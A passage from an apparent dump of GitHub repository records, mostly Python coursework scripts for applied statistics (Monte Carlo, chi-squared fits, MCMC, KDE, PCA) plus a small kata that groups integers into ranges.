X_test[i])\n\ndata_bg = signal.reshape(int(len(signal) / 3), 3)\ndata_signal = background.reshape(int(len(background) / 3), 3)\n\nplt.figure()\nplt.plot(data_bg[:, 0], data_bg[:, 1], 'r.', label='X vs Y BG')\nplt.plot(data_signal[:, 0], data_signal[:, 1], 'b.', label='X vs Y Signal')\nplt.legend()\n\ndata_bg = 
data_dict['BDT_background_test']\ndata_signal = data_dict['BDT_signal_test']\n\nplt.figure()\nplt.plot(data_bg[:, 0], data_bg[:, 1], 'r.', label='X vs Y BG')\nplt.plot(data_signal[:, 0], data_signal[:, 1], 'b.', label='X vs Y Signal')\nplt.legend()\n\nplt.show()\n" }, { "alpha_fraction": 0.6247848272323608, "alphanum_fraction": 0.6609294414520264, "avg_line_length": 20.518518447875977, "blob_id": "1eadd39b4d45e562b5f5fa248f52354eee437a3f", "content_id": "1e571cc395d7e75ba560a1451b4bbe00d797972c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/Week_2/Class_4/bayes_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nk = 10\nbig_k = 100\nn = 60\n\n\ndef my_binomial_coefficient(n, k):\n result = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n return result\n\ndef my_hypergeo(k, K, n, N):\n result = my_binomial_coefficient(K, k) * my_binomial_coefficient(N - K, n - k) / my_binomial_coefficient(N, n)\n return result\n\n\nposterior = np.array([])\n\nfor i in np.arange(150, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n posterior = np.append(posterior, temp)\n\nplt.plot(np.arange(150, 2000), posterior)\nplt.show()\n" }, { "alpha_fraction": 0.5607560873031616, "alphanum_fraction": 0.5913591384887695, "avg_line_length": 21.219999313354492, "blob_id": "4943eba450b892fbe07176c12ca66f16fec27a9d", "content_id": "95bec0acdc2d64a7da96fd3c03b5a8c54d2490e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1111, "license_type": "no_license", "max_line_length": 55, "num_lines": 50, "path": "/Week_1/Class_2/mc_pi_multi.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nrandom.seed(142)\n\n# N is the number of throws per test and A is area\nN = 100\nnumber_of_tests = 1000\nA = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n A = np.append(A, len(x) / N * 4 * 5.2 ** 2)\n\nbinwidth = 3\nn_bins = np.arange(min(A), max(A) + binwidth, binwidth)\nplt.figure(1)\nplt.hist(A, bins=n_bins)\n\n\nbinwidth = 1\nn_bins = np.arange(min(A), max(A) + binwidth, binwidth)\nplt.figure(2)\nplt.hist(A, bins=n_bins)\n\n\nbinwidth = 0.1\nn_bins = np.arange(min(A), max(A) + binwidth, binwidth)\nplt.figure(3)\nplt.hist(A, bins=n_bins)\nplt.show()\n" }, { "alpha_fraction": 0.6309497356414795, "alphanum_fraction": 0.6440114974975586, "avg_line_length": 36.94117736816406, "blob_id": "afb84eefb3b10e488dfbbeb2599611dcc8c8be8a", "content_id": "5b1a3b5778fb51b6e1d1db8abd1493dd9a658854", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4517, "license_type": "no_license", "max_line_length": 118, "num_lines": 119, "path": "/Week_1/Class_1/Jason_script.py", "repo_name": 
"DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "##############################\n# D. Jason Koskinen\n# Dec. 22, 2015\n#\n# The exercise herein is to take a txt file\n# and read in multiple data sets of X and Y\n# input and calculate basic statitics quantities.\n#\n# Do everything in normal python arrays and then\n# use the numpy converter to put the data into\n# numpy arrays. Why? Because numpy arrays are hard.\n#\n# The data set is somehwat of a classic in statistics\n# and is known as Anscombe's quartet.\n##############################\n\nimport io\nimport numpy as np\nimport scipy as sp\nfrom scipy import stats as stats\n\ninfile = io.open(\"FranksNumbers.txt\")\n\n# Making an empty array to fill with arrays. Normally\n# arrays of arrays is a bad sign, but it will work out\n# fine this time.\n\nmetaArray = []\n\nfor line in infile.readlines():\n splLine = line.split()\n if len(splLine) == 3:# This is when the data sets change\n metaArray.append([])\n # end if len()\n if len(splLine) == 0 or (not splLine[0].isdigit()):\n continue\n # end not if\n \n # read in from text is generally a string so make sure\n # to explicitly cast the variable as a float\n \n x = float(splLine[0])\n y = float(splLine[1])\n metaArray[-1].append([x,y])\n# end for line\n\n# Convert the array of arrays into\n# a numpy array so that nice calculations\n# can be made with ease.\n \na = np.asarray(metaArray)\n\nfor i in range(0,len(a)):\n slope = stats.linregress(a[i])[0]\n intercept = stats.linregress(a[i])[1]\n slope = 0.48\n intercept = 3.02\n # The following code 'flattens' the tuple, which then includes\n # the x-values (1st column in the file) as part of the set over\n # which to compute the variance.\n # but actually we just want to compute the variance of the y-values.\n print ('Variance for dataset %i: %f (WRONG VALUE)' % (i, np.var(a[i])))\n\n # The following code tells numpy (via the axis=0) to calculate\n # the variance over the\n # separate data columns (x and y), where we're mostly interested in the\n # variance in y. Also, there are two ways to think of the\n # exercise as written in the lecture notes:\n # A) you are given the line and therefore the degrees of freedom\n # are equal to the number of data points, or\n # B) the variance should be calculated using the 'unbiased'\n # estimator (shown on slide 3) which corrects the\n # degrees of freedom to be N-1. By default numpy uses\n # that the change to the degrees of freedom (ddof) is zero.\n # Ergo, for an unbiased estimator we maybe, possibly, kinda, sort of,\n # should use N-1 stead of N. Also, Troels said that he stressed this\n # in his class, so all of the students from his course should\n # know this.\n \n print (\"Variance for dataset %i: %f (CORRECT VALUE FOR BIASED VARIANCE)\" % (i, np.var(a[i], axis=0, ddof=0)[1]))\n print (\"Variance for dataset %i: %f (CORRECT VALUE FOR UNBIASED VARIANCE)\" % (i, np.var(a[i], axis=0, ddof=1)[1]))\n print (\"linear regression: y=%0.2fx + %0.2f\" % (stats.linregress(a[i])[0], stats.linregress(a[i])[1]))\n \n # just get the y-values, i.e. the observed data.\n # Note that this is more easily done if the data sets\n # have the exact numbers of entries, unlike here. 
The\n # difference is where you put the [:,1] and whether it\n # is necessary to 'recreate' a new numpy array.\n \n observed = sp.array(a[i])[:,1]\n expected = []\n chisq_value = 0\n chisq_valuewith = 0\n\n # loop over all the data points in the data set\n # to calculate the expected values of y at each\n # value of x.\n for j in range(0, len(a[i])):\n x = a[i][j][0]\n y = x*slope + intercept\n expected.append(y)\n chisq_value += (y - observed[j])*(y - observed[j])/y\n chisq_valuewith += (y - observed[j])*(y - observed[j])/(1.22*1.22)\n # end for x,y\n \n print (\"chi-squared By hand: \", chisq_value)\n print (\"chi-squared From SciPy: \", stats.chisquare(observed,expected)[0])\n print (\"chi-squared (w/ \\pm 1.22 uncertainty): \", (chisq_valuewith))\n print (\"Reduced chi-squared: \", (chisq_value)/(len(a[i])-2))\n print (\"Reduced chi-squared (w/ \\pm 1.22 uncertainty): \", (chisq_valuewith)/(len(a[i])-2))\n print (\"\\n\\n\")\n \n# end for i\n\n# There is a larger questions here related to calculation\n# of the chi-squared value; we can do it, but if we do not know\n# actually what the data is (money, number of cows, speed of a toddler, etc.)\n# can the chi-squared or the reduced chi-squared tell use\n# anything meaningful?\n\n\n" }, { "alpha_fraction": 0.5284630060195923, "alphanum_fraction": 0.5635673403739929, "avg_line_length": 22.422222137451172, "blob_id": "9606129c27c0e87490a8c1f77f0082a39a7b9a46", "content_id": "4afeb5b233120ad639278b6d573da6d83c23cda8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1054, "license_type": "no_license", "max_line_length": 65, "num_lines": 45, "path": "/Week_4/Class_7/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import chisquare\n\n\nfname = 'MLE_Variance_data.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx_1 = loaded_file[:, 0]\nx_2 = loaded_file[:, 1]\n\n\ndef norm(x, alpha, beta):\n upper_lim = (max(x) + 1 / 2 * alpha * (max(x) ** 2) +\n 1 / 3 * beta * (max(x) ** 3))\n lower_lim = (min(x) + 1 / 2 * alpha * (min(x) ** 2) +\n 1 / 3 * beta * (min(x) ** 3))\n\n integral = upper_lim - lower_lim\n return integral\n\n\ndef my_func(x, alpha, beta):\n return (1 + alpha * x + beta * x ** 2) / norm(x, alpha, beta)\n\n\nbinwidth = 0.05\nn_bins = np.arange(min(x_1), max(x_1) + binwidth, binwidth)\ny, x, _ = plt.hist(x_1, bins=n_bins, normed=1)\n\nx = x + binwidth / 2\n\npopt, pcov = curve_fit(my_func, x[0:-1], y)\n\nplt.plot(x, my_func(x, *popt), 'r--',\n label='fit: a=%5.3f, b=%5.3f' % tuple(popt))\n\nplt.plot(x[0:-1], y, linestyle='none', marker='.')\nplt.legend()\nplt.show()\n\n\nprint(chisquare(y, my_func(x[0:-1], *popt), ddof=len(y)-2))\n" }, { "alpha_fraction": 0.45143386721611023, "alphanum_fraction": 0.48843663930892944, "avg_line_length": 26.024999618530273, "blob_id": "7f95e65a51a41318e8abd5b452b0028f6870cd9a", "content_id": "fbb8b3522dbb5ad45a2c844324b18f8751daaf7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/Week_6/Class_12/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef test_statistic(N):\n\n N_bins = len(N)\n N_tot = np.sum(N)\n x = N[0]\n\n if 
x == 0:\n result = (2 * N_tot * np.log(N_bins / N_tot *\n N_tot / (N_bins - 1)))\n elif (N_tot - x) == 0:\n result = (2 * x * np.log(N_bins / N_tot * x))\n else:\n result = (2 * x * np.log(N_bins / N_tot * x) +\n 2 * (N_tot - x) * np.log(N_bins / N_tot *\n (N_tot - x) / (N_bins - 1)))\n return result\n\n\nN = 1000\nmy_lambda = [0.1, 10, 1000]\n\nfor i, the_lambda in enumerate(my_lambda, 1):\n vars()['TS_' + str(i)] = np.array([])\n for _ in range(N):\n s = np.random.poisson(the_lambda, 100)\n temp = test_statistic(s)\n vars()['TS_' + str(i)] = np.append(vars()['TS_' + str(i)], temp)\n\n# binwidth = 0.05\n# n_bins = np.arange(min(s), max(s) + binwidth, binwidth)\nplt.hist(TS_1, log=True, bins=100)\nplt.figure()\nplt.hist(TS_2, log=True, bins=100)\nplt.figure()\nplt.hist(TS_3, log=True, bins=100)\nplt.show()\n" }, { "alpha_fraction": 0.7150259017944336, "alphanum_fraction": 0.7357512712478638, "avg_line_length": 16.636363983154297, "blob_id": "1e895394d1f93d3a12c9dc5e9be4583f54a62020", "content_id": "23fc7521582c6f2a4fff42918eb562d86b450d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 39, "num_lines": 11, "path": "/Week_6/Class_12/untitled.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport xgboost as xgb\n\ndata = np.random.rand(5, 3)\nlabel = np.random.randint(2, size=5)\n\ndtrain = xgb.DMatrix(data, label=label)\n\nprint(data)\nprint(label.shape)\nprint(dtrain)" }, { "alpha_fraction": 0.5116550326347351, "alphanum_fraction": 0.5396270155906677, "avg_line_length": 18.930233001708984, "blob_id": "5081def7f09b99b2ccf12bcb85762ad5b833cc74", "content_id": "ee15bf12ae60c903414663726ca680d2199755b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 63, "num_lines": 43, "path": "/Week_3/Class_6/markov_chain_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import beta\nfrom scipy.stats import binom\n\nmu = 0\nsigma = 0.3\n\na = 5\nb = 17\nx = 0.1\n\nn = 100\nk = 66\n\n\nkeept = np.array([])\n\nfor i in np.arange(2000):\n\n x_new = x + np.random.normal(mu, sigma, 1)\n\n if x_new < 0:\n x_new = x + np.random.normal(mu, sigma, 1)\n\n r = (beta.pdf(x_new, a, b) * binom.pmf(k, n, x_new) /\n (beta.pdf(x, a, b) * binom.pmf(k, n, x)))\n if r > 1:\n keept = np.append(keept, x_new)\n x = x_new\n else:\n keep_or_not = np.random.uniform()\n if r > keep_or_not:\n keept = np.append(keept, x_new)\n x = x_new\n else:\n keept = np.append(keept, x)\n x = x\n\nbinwidth = 0.01\nn_bins = np.arange(min(keept), max(keept) + binwidth, binwidth)\nplt.hist(keept, bins=n_bins)\nplt.show()\n\n" }, { "alpha_fraction": 0.6353658437728882, "alphanum_fraction": 0.6658536791801453, "avg_line_length": 20.605262756347656, "blob_id": "c0fb2de6428742c8092966eda43e21b0ffa57e72", "content_id": "a32e8cde363765340c422ddae9265d78a035ea24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/Project/open_files.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as 
np\n\nfile = 'digit-recognizer/train.csv'\ndata = pd.read_csv(file)\n\n\n# print(data.head())\n# print(data.iloc[0, 1::])\n\n\nnumpy_data = data.values\ndata_mean_vector = np.mean(numpy_data[:, 1:], axis=0)\n\ndata_tilte = (numpy_data[:, 1:] - data_mean_vector)\ncov_mat = np.cov(data_tilte.T)\neig_vals, eig_vecs = np.linalg.eig(cov_mat)\n\neig_pairs = [ (np.abs(eig_vals[i]),eig_vecs[:,i]) for i in range(len(eig_vals))]\neig_pairs.sort(key = lambda x: x[0], reverse= True)\n\n\nimage = numpy_data[0, 1:].reshape((28, 28))\nimage1 = data_tilte[0, :].reshape((28, 28))\n\nplt.imshow(image, cmap='hot')\nplt.colorbar()\n\nplt.figure()\n\nplt.imshow(image1, cmap='hot')\nplt.colorbar()\nplt.figure()\n\nplt.imshow(eig_pairs[1][1].reshape((28, 28)), cmap='hot')\nplt.colorbar()\nplt.show()" }, { "alpha_fraction": 0.5172228217124939, "alphanum_fraction": 0.5683530569076538, "avg_line_length": 18.5473690032959, "blob_id": "27edc753ebb9d60715a2ffa25d77e69ef363d010", "content_id": "eb91cb2967c765493c2909b59173b4a4de8bd524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1858, "license_type": "no_license", "max_line_length": 98, "num_lines": 95, "path": "/Exam_prep/test_prob1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\n\n\ndef f_1(x, a):\n return (1 / (x + 5)) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * (x ** 2))\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3)) \n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * (b ** 2)))\n\ndef my_pdf(VAR, x):\n a = VAR\n\n pdf = f_1(x, a)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\n\nz = data[:, 0]\n\na_bound = (-10, 0)\nb_bound = (-10, 10)\nc_bound = (4000, 8000)\n\nn_bound = (0, None)\np_bound = (0, None)\n\nmu_bound = (0, None)\n\ndata_0 = minimize(my_pdf, [1, ], args=(z), method='SLSQP',\n bounds=(a_bound, ))\n\n\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y+0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n\n# Chi2 calculator\n# observed_values, bins, _ = plt.hist(data[:, 2], bins=n_bins)\n\n# plt.show()\n# We normalize by multiplyting the length of the data with the binwidth\n# expected_values = poisson.pmf(bins, data_0.x[0]) * len(data) \n\n# print(observed_values[observed_values!=0])\n# print(expected_values[expected_values!=0])\n# print(chisquare(observed_values[observed_values!=0], f_exp=expected_values[expected_values!=0]))\n# print('Threshold value ', chi2.isf(0.05, 18))\n\n\n# x = np.arange(-1, 1, 0.01)\n# y = f_6(x, data_0.x[0], data_0.x[1]) \n# plt.plot(x,y)\n# plt.show()\n\n" }, { "alpha_fraction": 0.5875542759895325, "alphanum_fraction": 0.6620839238166809, "avg_line_length": 32.73170852661133, "blob_id": "1178b35361c9c76c135bba66322333731c034d01", "content_id": "5c20e4d39b9db2e6c4eb6acd86616288a7a5e89c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 1382, "license_type": "no_license", "max_line_length": 83, "num_lines": 41, "path": "/Week_2/Class_4/spline_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\n\n\nfname = 'SplineCubic.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx = loaded_file[:, 0]\ny = loaded_file[:, 1]\n\nf = interp1d(x, y)\nf1 = interp1d(x, y, kind='cubic')\nf2 = interp1d(x, y, kind='quadratic')\n\nx_new = np.linspace(min(x), max(x), len(x)*1000, endpoint=True)\n\nplt.plot(x, y, 'k', marker='o', markersize='2', linestyle='none')\nplt.plot(x, f(x), 'b', linestyle='--')\nplt.plot(x_new, f1(x_new), 'r--')\nplt.plot(x_new, f2(x_new), 'g--')\n\nplt.show()\n\nresult = integrate.quad(lambda x: f(x), 10e-5, 0.01)\nresult_cubic = integrate.quad(lambda x: f1(x), 10e-5, 0.01)\nresult_quadradic = integrate.quad(lambda x: f2(x), 10e-5, 0.01)\n\nprint('Integral of Normal from 10e-5 to 0.01 is: %8.2f' % (result[0]))\nprint('Integral of Cubic from 10e-5 to 0.01 is: %8.2f' % (result_cubic[0]))\nprint('Integral of Quadratic from 10e-5 to 0.01 is: %8.2f' % (result_quadradic[0]))\n\nresult = integrate.quad(lambda x: f(x), 0.03, 0.1)\nresult_cubic = integrate.quad(lambda x: f1(x), 0.03, 0.1)\nresult_quadradic = integrate.quad(lambda x: f2(x), 0.03, 0.1)\n\nprint('Integral of Normal from 0.03 to 0.1 is: %8.2f' % (result[0]))\nprint('Integral of Cubic from 0.03 to 0.1 is: %8.2f' % (result_cubic[0]))\nprint('Integral of Quadratic from 0.03 to 0.1 is: %8.2f' % (result_quadradic[0]))" }, { "alpha_fraction": 0.47252747416496277, "alphanum_fraction": 0.5560439825057983, "avg_line_length": 13.612903594970703, "blob_id": "bff1a507e2079de4b569a2f965b16b4a4ba626a7", "content_id": "20595de58292ac67f7ef7767c2214e025f4bb93c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 92, "num_lines": 31, "path": "/Week_2/Class_3/simple_example_likelyhood.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\nx = np.array([1.01, 1.3, 1.35, 1.44])\n\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\nmu = 1.25\nsigma = np.sqrt(0.11)\n\n\nanswer_1 = 1\n\nfor i in x:\n answer_1 = answer_1 * my_gauss(i, mu, sigma)\n\nmu = 1.30\nsigma = np.sqrt(0.5)\n\n\nanswer_2 = 1\n\nfor i in x:\n answer_2 = answer_2 * my_gauss(i, mu, sigma)\n\nprint(answer_1)\nprint(answer_2)\n\n\n" }, { "alpha_fraction": 0.580136239528656, "alphanum_fraction": 0.6453925967216492, "avg_line_length": 27.1616153717041, "blob_id": "e60e1e5c81f56245b0ce94a79954b1121579d579", "content_id": "941e3b24dfb598819b8209112fd7ecd86c6fbbf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2789, "license_type": "no_license", "max_line_length": 66, "num_lines": 99, "path": "/Problem_set_2/problem_4.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KernelDensity\nfrom scipy import integrate\nimport random\n\nrandom.seed(148)\n\n# Deletes -99.99 from array and return flattened array\ndef remove_99(arr):\n temp = np.argwhere(arr == -99.99).flatten()\n 
return np.delete(arr.flatten(), temp)\n\n\n# Load list of data into dictionary\ndef load_data(fnames):\n data = {name: np.loadtxt(name, skiprows=1) for name in fnames}\n return data\n\n\nfnames = ['GlobalTemp_1.txt', 'GlobalTemp_2.txt']\ndata = load_data(fnames)\n\n# Sanity check\nprint(data['GlobalTemp_1.txt'][6, 0]) # Should be 0.74\nprint(data['GlobalTemp_2.txt'][6, 0]) # Should be 1.07\n\n# Remove -99.99 from row 8\ndata_row8_1997 = remove_99(data['GlobalTemp_1.txt'][6, None])\ndata_row8_2017 = remove_99(data['GlobalTemp_2.txt'][6, None])\n\nx1 = np.linspace(-2, 4, 1000)\nx2 = np.linspace(-2, 4, 1000)\nkde1 = KernelDensity(kernel='epanechnikov',\n bandwidth=0.4).fit(data_row8_1997[:, None])\nkde2 = KernelDensity(kernel='epanechnikov',\n bandwidth=0.4).fit(data_row8_2017[:, None])\n\n\ndef f_kde1(x):\n return np.exp((kde1.score_samples([[x]])))\n\n\ndef f_kde2(x):\n return np.exp((kde2.score_samples([[x]])))\n\n\n# Remember score_samples return log(probability density) !!!!!\np1 = np.exp(kde1.score_samples(x1[:, None]))\np2 = np.exp(kde2.score_samples(x2[:, None]))\n\nprint('Integrating kde1 from -2 to 4 gives: %.2f' %\n integrate.quad(f_kde1, -2, 4)[0])\nprint('Integrating kde2 from -2 to 4 gives: %.2f' %\n integrate.quad(f_kde2, -2, 4)[0])\nprint('Integrating kde1 from -2 to 0 gives: %.2f' %\n integrate.quad(f_kde1, -2, 0)[0])\nprint('Integrating kde2 from -2 to 0 gives: %.2f' %\n integrate.quad(f_kde2, -2, 0)[0])\n\n\nN = 1000\nn_hit = 0\n# Fill my arrays with random numbers\n\nx = np.empty((1, 0))\ny = np.empty((1, 0))\nx_missed = np.empty((1, 0))\ny_missed = np.empty((1, 0))\n\nwhile n_hit < 1000:\n\n x_random = random.uniform(-1, 2)\n y_random = random.uniform(0, 1)\n if y_random < f_kde1(x_random):\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n n_hit += 1\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\nLikelihood_0 = np.exp((kde1.score_samples(x[:, None])))\nLikelihood_1 = np.exp((kde2.score_samples(x[:, None])))\n\nLikelihood_ratio = Likelihood_0 / Likelihood_1\n\nprint('Ratio is:', np.prod(Likelihood_ratio))\n\nnp.savetxt('ramyar_KDE_1000_samples.txt', x)\n\nplt.figure(figsize=(7,4))\nplt.plot(x1, p1, label='KDE Epanechnikov 1997 Data')\nplt.plot(x2, p2, label='KDE Epanechnikov 2017 Data')\nplt.plot(x, y, label='1000 Samples from 1997 KDE', marker='.',\n linestyle='None', markersize=2)\nplt.legend()\nplt.savefig('kdeplots', dpi=200)\n# plt.show()\n\n" } ]
48
LuanComputacao/katas_sequencia_numerica
https://github.com/LuanComputacao/katas_sequencia_numerica
247921f28c458cfdcd9c5b6a4e84b68c519e9f62
12e8bc0398bfda643dad0a93bc2fb7d57e066579
00cfc8da7773299eec4794771ee16353fff4a16a
refs/heads/master
2022-01-26T13:56:08.723942
2019-09-15T06:30:19
2019-09-15T06:30:19
208,521,739
1
0
null
2019-09-15T00:39:09
2020-01-24T17:27:25
2022-01-21T19:53:46
Python
[ { "alpha_fraction": 0.4661654233932495, "alphanum_fraction": 0.6090225577354431, "avg_line_length": 23.18181800842285, "blob_id": "866e8855f590ce776e882a8421c641ebb2121692", "content_id": "366e3b89a91ade619a3ce284a28ffb004c60b115", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 266, "license_type": "no_license", "max_line_length": 82, "num_lines": 11, "path": "/workshop.py", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "import io\nimport sys\nfrom src.agrupador import group\n\nif __name__ == \"__main__\":\n '''\n use o seguinte comando para executar\n \n python -m unittest test_workshop.py\n '''\n print(group([100, 101, 102, 103, 104, 105, 110, 111, 113, 114, 115, 150, 70]))\n" }, { "alpha_fraction": 0.6214285492897034, "alphanum_fraction": 0.6299999952316284, "avg_line_length": 24.301204681396484, "blob_id": "484883e53fe1cb47e9829a9f9ab386731a325e6d", "content_id": "25fadc064af9b5adc8b54960f581db20b98d2204", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2101, "license_type": "no_license", "max_line_length": 83, "num_lines": 83, "path": "/src/agrupador.py", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "#\n\"\"\"\nDado uma lista de números inteiros, agrupe a lista em um conjunto de intervalos\n\n\"\"\"\n\n\ndef group(numbers):\n \"\"\" Group the number sequences\n :param numbers: \n :return: \n \"\"\"\n groups = find_sequences(numbers)\n groups = [sequence_to_string(sequence) for sequence in groups]\n\n return groups\n\n\ndef find_sequences(numbers):\n \"\"\"Sort the sequence and returns the splited sequence\n \n :param numbers: numbers list\n :return: list of sequences\n \"\"\"\n numbers = list(set(numbers))\n numbers.sort()\n\n return group_sequences(numbers)\n\n\ndef group_sequences(numbers, sequences=[]):\n \"\"\"Group a numbers list into sequence representations\n \n :param numbers: \n :param sequences: list of numbers list of sequence representation\n :return: \n \"\"\"\n starts = numbers[0]\n ends, depth = sequence_ends(numbers)\n\n numbers = numbers[depth + 1:]\n sequence = [starts, ends] if ends - starts > 0 else [starts]\n\n new_sequences = sequences + [sequence]\n\n if len(numbers) < 1:\n return new_sequences\n else:\n return group_sequences(numbers, new_sequences)\n\n\ndef sequence_ends(numbers, depth=0):\n \"\"\"Find the last number of a sequence of the first number\n \n :param numbers: numbers list\n :type numbers: list\n :param depth: amount of numbers forwarded\n :type depth: int\n :return: The number and the forwarded steps to the last number of the sequence\n :rtype list:\n \"\"\"\n if len(numbers) > 1:\n if numbers[1] - numbers[0] != 1:\n return [numbers[0], depth]\n else:\n return sequence_ends(numbers[1:], int(depth + 1))\n\n return [numbers[0], depth]\n\n\ndef sequence_to_string(starts_ends):\n \"\"\"Convert the sequence list representation to a sequence string representation\n \n :param starts_ends: \n :return: \n \"\"\"\n len_starts_ends = len(starts_ends)\n if len_starts_ends == 1:\n return \"[{}]\".format(str(starts_ends[0]))\n elif len_starts_ends == 2:\n return \"[{}-{}]\".format(str(starts_ends[0]), str(starts_ends[1]))\n else:\n return \"[-]\"\n" }, { "alpha_fraction": 0.4482758641242981, "alphanum_fraction": 0.6724137663841248, "avg_line_length": 13.75, "blob_id": "628a7dd394c8f273de6668e070dec897fb1369d6", "content_id": 
"2c559a3916a4f908bd717dc773408f719ec0851a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 58, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/requirements.txt", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "autopep8==1.3.3\nipython==5.8.0\npylint==1.5.5\npytest==4.6.5" }, { "alpha_fraction": 0.5567567348480225, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 13.945945739746094, "blob_id": "d66254321b85a18110fbcd3612e18960fca5777b", "content_id": "ba814ef671640da0e93935e2a6270d765a7a7d01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 559, "license_type": "no_license", "max_line_length": 79, "num_lines": 37, "path": "/README.md", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "# Code Kata: Intervalos\n\n## Descrição\n\nDado uma lista de números inteiros, agrupe a lista em um conjunto de intervalos\n\nExemplo:\n\n### Entrada:\n\n```python\ninput = [100, 101, 102, 103, 104, 105, 110, 111, 113, 114, 115, 150, 70]\n```\n\n### Saída:\n```python\noutput = [70], [100-105], [110-111], [113-115], [150]\n```\n\n## 